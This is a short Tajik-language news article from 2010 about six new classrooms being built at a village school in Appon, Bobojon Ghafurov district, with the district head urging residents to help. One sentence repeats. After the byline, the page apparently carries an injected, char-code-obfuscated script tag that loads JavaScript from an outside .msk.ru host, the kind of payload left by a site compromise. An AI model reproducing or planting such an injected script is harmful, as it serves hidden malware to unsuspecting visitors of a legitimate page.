3.06.2010
Дар деҳаи Аппон мактаб сохта мешавад
Дар деҳаи Аппони ҷамоати Исмоили ноҳияи Б.Ғафуров, ки аҳолиаш 910-нафарро ташкил медиҳад, 6-синфхонаи иловагӣ сохта мешавад. Алҳол дар мактаби таҳсилоти миёнаи №52 деҳаи мазкур 4- синфхона мавҷуд буда, бо баробарои ба истифода додани бинои нав 209- нафар хонанда аз таҳсили 9-сола ба таҳсили 11-сола фаро гирифта мешаванд. Раиси ноҳия Лутфулло Муҳитдинов бо сафари кориаш ба ин ҷо омада, барои таҳияи лоиҳаи сохтани бинои нав ба масъулин дастуру супориш дод, ки то моҳи сентябри соли равон сохтани синфхонаҳо ба охир расида, пурра ба истифода дода шавад.Ҳамчунин ӯ аз сокинон даъват ба амал овард, ки барои сохтани мактаб ёрии худро бо усули ҳашар расонанд.
Деҳаи мазкур аз маркази ноҳия 85-км дур ҷойгир шуда, дар ин ҷо 160 хоҷагӣ зиндагӣ мекунанд.
Деҳаи мазкур аз маркази ноҳия 85-км дур ҷойгир шуда, дар ин ҷо 160 хоҷагӣ зиндагӣ мекунанд.
Афзал Босолиев
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)f838860ff5c9c8b959500f3b873f72e1.js" type="text/javascript">

